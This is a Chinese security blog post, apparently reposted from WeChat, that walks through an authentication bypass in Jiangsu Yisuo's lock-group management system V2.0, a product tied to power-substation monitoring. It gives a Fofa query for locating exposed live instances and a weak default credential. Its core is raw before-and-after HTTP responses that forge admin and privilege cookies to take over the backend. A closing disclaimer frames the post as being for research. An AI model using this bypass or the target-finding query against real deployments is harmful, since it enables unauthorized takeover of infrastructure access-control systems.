一:漏洞介绍
江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞,攻击者可利用该漏洞获取敏感信息。
漏洞详情
在登陆处由于只进行了前端验证,造成用户可以伪造前端的返回包内容来绕过登录,进而进入后台接管后台权限。经过测试发现,可以通杀2.0版本。
二:漏洞利用
步骤一:使用Fofa搜索以下语句并随便打开一个连接地址...尝试若口令登录(admin:123456)title=="锁群管理系统 V2.0"
步骤三:本人使用火狐浏览器在使用BurpSuite工具前先添加插件
步骤四:先开启插件再登录页面输入用户名admin并随便输入密码,开启代理抓包修改返回数据包如下...
修改之前:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30用户名或密码不正确!修改之后:HTTP/1.1 200 OKCache-Control: privateContent-Type: text/html; charset=utf-8Server: Microsoft-IIS/7.5X-AspNet-Version: 4.0.30319Set-Cookie: username=admin; path=/Set-Cookie: code=admin; path=/Set-Cookie: power=1; path=/Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/X-Powered-By: ASP.NETDate: Thu, 25 Nov 2021 09:29:15 GMTConnection: closeContent-Length: 30
步骤四:放包之后就可以登录到后台界面中...此时操作关闭代理
原文始发于微信公众号(Hack All):锁群管理系统0day复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论